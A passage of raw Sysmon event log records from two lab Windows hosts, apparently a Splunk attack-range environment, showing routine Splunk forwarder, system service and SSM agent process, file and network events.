LL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216347Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:48:51.513{4F8D34B0-F11B-6215-0500-000000003902}4121208C:\Windows\system32\csrss.exe{4F8D34B0-1113-6216-4F04-000000003902}1216C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000216346Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:48:51.513{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-1113-6216-4F04-000000003902}1216C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000216345Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:48:51.514{4F8D34B0-1113-6216-4F04-000000003902}1216C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000287359Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:48:52.941{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D10AE28DDEAC2F073FEC974885D928C8,SHA256=887CD99CCEA169F3037956AA0CA51D79BD7DD141463B76C83F43CD538856CE35,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000216361Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:48:52.592{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=491E09847062867DA0FFD75E7C93BA44,SHA256=A7F1550E3AC5308765286D9238CB53B3B9AF13854BBC0E614F7DD69889271CBA,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000287358Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:48:49.587{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53414-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000216360Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:48:52.513{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=3C920CE9F3C2473BF613326EDE9AC970,SHA256=F0814D17E351B7382C42F64CFF44A003AECEF66DDDA1A1386907268F4F7191B0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000287360Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:48:53.957{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E38ED70FAC47F6D02161DF848DE97B37,SHA256=C955F3C0A14457D15DA8DAE2F8451CF2EA045AD5F77EA06700E34B8D9F8AAC82,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000216362Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:48:53.592{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0DEA1C9472F35538F4D7C9832369420B,SHA256=89A280B90C7629817C5E83C094A5E53AAFE95156CBADFB424FC5583BD6FF2288,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000287361Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:48:54.957{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C3EF950D4B2A0E7673CE434799FEAEFC,SHA256=CF932222EEC281A0EBEF856468AE0342EDB7C9626ED92FA62BC03AE443F37CC7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000216363Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:48:54.607{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BC9E7602A12479B455BDBDEB2E3EAE5F,SHA256=5EEFA013191328573448A7AE9E36B82BC1EC75910B57EDB804100752420623EA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000216365Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:48:55.842{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E067CE05AC00769C4A478B362C071233,SHA256=5458AEC206D2D6996037009F304EF6699E83C361DD3D70431554C9E3C2B1156B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000216364Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:48:55.221{4F8D34B0-F11D-6215-1D00-000000003902}1876NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-04ffbe17aee3fbf0d\channels\health\respondent-20220223083233-132MD5=7840F8D654EED3E7C6FA395A9E23FA56,SHA256=FC4C38DACEF1698268BE802A03907A00216EAC67FA531AF20528DD4173FB9624,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000216367Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:48:54.643{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51319-false10.0.1.12-8000- 23542300x8000000000000000216366Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:48:56.234{4F8D34B0-F11D-6215-1D00-000000003902}1876NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-04ffbe17aee3fbf0d\channels\health\surveyor-20220223083230-133MD5=97EF2A570B75C4F95FC69B0D09A2E2A2,SHA256=11396EA313B0ED7E3228C4FA92ABE9D836DB8F416A7A8A28ACC77133025082E7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000287362Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:48:56.004{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7EE17826F7027EC7410C3BFD878461FB,SHA256=CC4357DA019DC77FED6D1A14E9E7904ABA0ABF0B010BEEEC30B20F3E33542ED9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000216368Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:48:57.019{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C724B7D3C939CE6DD513CE5C74D63A7D,SHA256=8528A6852752ABDC4C6A4F23DDC8074221AF248FEDE22982ED06A8170AE04A78,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000287363Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:48:57.004{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6130CEA927F5E9BA976211E196A1C788,SHA256=283C1AFAAB14B04366FC063D58FBE338C462C18307DF49D29510FCF67B6694AD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000216369Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:48:58.035{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A037F6E7967A05E91F5A2C64F1E69F91,SHA256=7B2F6292A10FE200D1557DD5AF883378574C588B0D122C50F1A98C35959CED2B,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000287367Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:48:56.387{C8EA50B7-F118-6215-0100-000000003802}4SystemNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.255-138netbios-dgmfalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local138netbios-dgm 354300x8000000000000000287366Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:48:56.387{C8EA50B7-F118-6215-0100-000000003802}4SystemNT AUTHORITY\SYSTEMudptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local138netbios-dgmfalse10.0.1.255-138netbios-dgm 354300x8000000000000000287365Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:48:55.524{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53415-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000287364Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:48:58.019{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A2AA7E37082B2B416576730F1CE47D30,SHA256=D90B9330E0B5D2068160FCAEFB3360B23BDB9133F7ACAB1F42FA6756A08F35A7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000216370Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:48:59.253{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=27A36522A846E9AD81775BD1E1C2D977,SHA256=FE5A14A2BD23641F333A1E165974B59B532EB2CB1039269DC42B71A6C7EA6FCB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000287368Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:48:59.019{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1A5E8EE8B4EB97B10E42A413B2392D52,SHA256=5CA55840F5767CF57FDAAB807F1C7171CA24D4123DAB3CF28FA33CC0F91194CF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000216371Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:49:00.441{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=73D20DC426131BEFB4B27FFA4BE1CB6C,SHA256=A8D23710D1DB167E2FF99BA9EB7B5AA25A57128A3BBCB5FC77261809B2658792,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000287369Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:49:00.066{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B3058CBE25764C00ECBF47BFB0114762,SHA256=7BD0DD01D5943AC743BFF4E48370AB3678557DCF461C6DCCD614E9C5BA7AF90A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000216372Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:49:01.503{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5AD4084F6E9C6C874D09780F36E3CB80,SHA256=4CDAEC48400A24C6904958E6F0AADD5F13C6F868C67EAB07318F8B9B06A856B4,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000287378Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:49:01.582{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-111D-6216-FE04-000000003802}5176C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287377Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:49:01.582{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287376Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:49:01.582{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287375Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:49:01.582{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287374Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:49:01.582{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287373Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:49:01.582{C8EA50B7-F11C-6215-0500-000000003802}412368C:\Windows\system32\csrss.exe{C8EA50B7-111D-6216-FE04-000000003802}5176C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000287372Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:49:01.582{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-111D-6216-FE04-000000003802}5176C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000287371Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:49:01.583{C8EA50B7-111D-6216-FE04-000000003802}5176C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000287370Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:49:01.082{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8760B3F759FC737DFAC5070F1B613A76,SHA256=B98ED6A7B8802896247F2FBAE8EEE7F702D106886EEB9C8F87ACE9F606EEA585,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000216374Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:48:59.647{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51320-false10.0.1.12-8000- 23542300x8000000000000000216373Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:49:02.519{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FDE8E0BDFB6902FA8E856756C1B72001,SHA256=BAA999F10FCD14853F7C4FC187618CC7EEC98A1C19930C6D6E57BD7C78C3DD34,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000287388Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:49:02.207{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-111E-6216-FF04-000000003802}5864C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287387Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:49:02.207{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287386Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 